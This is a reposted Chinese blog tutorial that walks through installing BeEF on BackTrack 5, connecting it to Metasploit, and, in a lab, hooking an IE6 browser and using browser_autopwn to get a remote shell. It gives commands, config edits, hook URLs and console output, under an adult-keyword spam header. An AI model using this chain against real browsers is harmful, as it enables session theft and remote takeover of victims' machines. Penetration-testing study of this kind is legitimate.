日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

初探BeEF

發布時間:2023/12/31 综合教程 32 生活家
生活随笔 收集整理的這篇文章主要介紹了 初探BeEF 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1.什么是BeEF?

就是The Browser Exploitation Framework 的縮寫,意在通過一些手段,控制對方的瀏覽器。

里面集成了很多模塊,能夠獲取很多東西,有cookie,瀏覽器名字,版本,插件,是否支持java,vb,flash等,所以說XSS神器嘛。。

大概長這個樣子(默認用戶名密碼是beef,beef):


2.安裝beef和使用beef

BT5r3 已經是自帶了ruby和beef了,我們不用下載和安裝了。

[plain]view plaincopy

ruby:ruby1.9.2dev(2010-07-02)[i486-linux]
beef:Version0.4.3.6-alpha

beef默認安裝在:/pentest/web/beef/ 下

metasploit默認安裝在:/opt/metasploit/下

翻看了下beef的安裝文檔:INSTALL.txt

[plain]view plaincopy

1.Prerequisites(platformindependent)

BeEFrequiresruby1.9andthe"bundler"gem.Bundlercanbeinstalledby:

geminstallbundler

.Prerequisites(Linux)

!!!ThismustbedonePRIORtorunningthebundleinstallcommand!!!

Onlinuxyouwillneedtofindthepackagesspecifictoyourdistributionforsqlite.AnexampleforUbuntusystemsis:

3.0.sudoapt-getinstalllibsqlite3-devsqlite3sqlite3-doc
3.1.installrvmfromrvm.beginrescueend.com,thistakescareofthevariousincompatableandconflictingrubypackagesthatarerequired
3.2.rvminstall1.9.2
3.3.rvmuse1.9.2

發現有個東西必須的安裝:bundler!(千古一問:為什么BT5不一起把bundler安裝好呢?)

總結了下就是:

[plain]view plaincopy

apt-getinstalllibsqlite3-devsqlite3sqlite3-doc
geminstallbundler
bundleinstall

如果出錯(因為環境變量的問題,我感覺看官們一定會出錯的,乖乖輸入下面的命令):

[plain]view plaincopy

geminstall--user-installbundler

然后開啟beef:./beef

出現如下信息則成功:

[plain]view plaincopy

root@bt:/pentest/web/beef#./beef
[9:17:50][*]BrowserExploitationFramework(BeEF)
[9:17:50]|Version0.4.3.6-alpha
[9:17:50]|Websitehttp://beefproject.com
[9:17:50]|Run'beef-h'forbasichelp.
[9:17:50]|_Run'gitpull'toupdatetothelatestrevision.
[9:17:50][*]SuccessfulconnectionwithMetasploit.
[9:17:53][*]Loaded203Metasploitexploits.
[9:17:53][*]BeEFisloading.Waitafewseconds...
[9:17:57][*]9extensionsloaded:
[9:17:57]|Console
[9:17:57]|Requester
[9:17:57]|Events
[9:17:57]|Proxy
[9:17:57]|XSSRays
[9:17:57]|Autoloader
[9:17:57]|Metasploit
[9:17:57]|Demos
[9:17:57]|_AdminUI
[9:17:57][*]316modulesenabled.
[9:17:57][*]2networkinterfacesweredetected.
[9:17:57][+]runningonnetworkinterface:127.0.0.1
[9:17:57]|HookURL:http://127.0.0.1:3000/hook.js
[9:17:57]|_UIURL:http://127.0.0.1:3000/ui/panel
[9:17:57][+]runningonnetworkinterface:192.168.198.128
[9:17:57]|HookURL:http://192.168.198.128:3000/hook.js
[9:17:57]|_UIURL:http://192.168.198.128:3000/ui/panel
[9:17:57][*]RESTfulAPIkey:c29aef201f68aee70afc6ffedea1f77e8304ce72
[9:17:57][*]HTTPProxy:http://127.0.0.1:6789
[9:17:57][*]BeEFserverstarted(presscontrol+ctostop)

其實BeEF能干很多事,比如說,控制被HOOK瀏覽器彈個框吧:


3.配置beef攜手Metasploit

首先關閉beef(Ctrl+C)。

在/opt/metasploit/文件夾下gedit beef.rc,寫入內容:

[plain]view plaincopy

loadmsgrpcServerHost=127.0.0.1Pass=abc123

這里上網搜了下,發現密碼神馬的最好不要改,那就不改啦~

安裝msgpack:

[plain]view plaincopy

geminstall--user-installmsgpack

修改配置讓beef支持metasploit:

[plain]view plaincopy

gedit/pentest/web/beef/config.yaml
把metasploit:
enable:false
改成:
metasploit:
enable:true

Ps:這里必須先開msf,再開beef,才能在beef下用msf,也就是說兩者開著一起工作!

我們啟動metasploit:

[plain]view plaincopy

root@bt:/opt/metasploit/msf3#msfconsole-rbeef.rc

出現如下信息就表示成功:

[plain]view plaincopy

[*]Processingbeef.rcforERBdirectives.
resource(beef.rc)>loadmsgrpcServerHost=127.0.0.1Pass=abc123
[*]MSGRPCService:127.0.0.1:55552
[*]MSGRPCUsername:msf
[*]MSGRPCPassword:abc123
[*]Successfullyloadedplugin:msgrpc


然后我們再啟動beef:

[plain]view plaincopy

root@bt:/pentest/web/beef#./beef

beef,beef登陸后我們就能看到一個可愛的界面了:


然后BeEF自帶了一個hack頁面,坐等別人上鉤:

[plain]view plaincopy

http://127.0.0.1:3000/demos/basic.html


里面主要是有這么一段js代碼:

[plain]view plaincopy

4.對XPSP1測試

(1)讓xp sp1 用IE6訪問hack頁面:

[plain]view plaincopy

http://192.168.198.128:3000/demos/basic.html


發現面板左側上多了一個目標,也就是我們喜歡的IE6:


(2)

拿msf生成HOOK鏈接:

[plain]view plaincopy

msf>useauxiliary/server/browser_autopwn
msfauxiliary(browser_autopwn)>setLHOST192.168.198.128#我服務器自己的地址
LHOST=>192.168.198.128
msfauxiliary(browser_autopwn)>run

然后出來一大堆URL,我們選擇,IE的一個:

[plain]view plaincopy

http://192.168.198.128:8080/hxRmMPkYJa

控制被HOOK的瀏覽器去訪問這個鏈接:

然后msf 突然就開始自己(意味著自動化,這點以前一直以為我要做些什么,其實不用)跑起來,拿到shell:


至此,BeEF就算是一個初步認識和使用了。

有很多功能還沒學會了,不過我感覺控制那個cookie之類的應該是沒問題了。。

這么強大的神器,你還在等什么呢?

emaster 關注信息安全的胖子

歡迎轉載,但轉載請注明地址:http://blog.csdn.net/emaste_r/article/details/17091067

總結

以上是生活随笔為你收集整理的初探BeEF的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。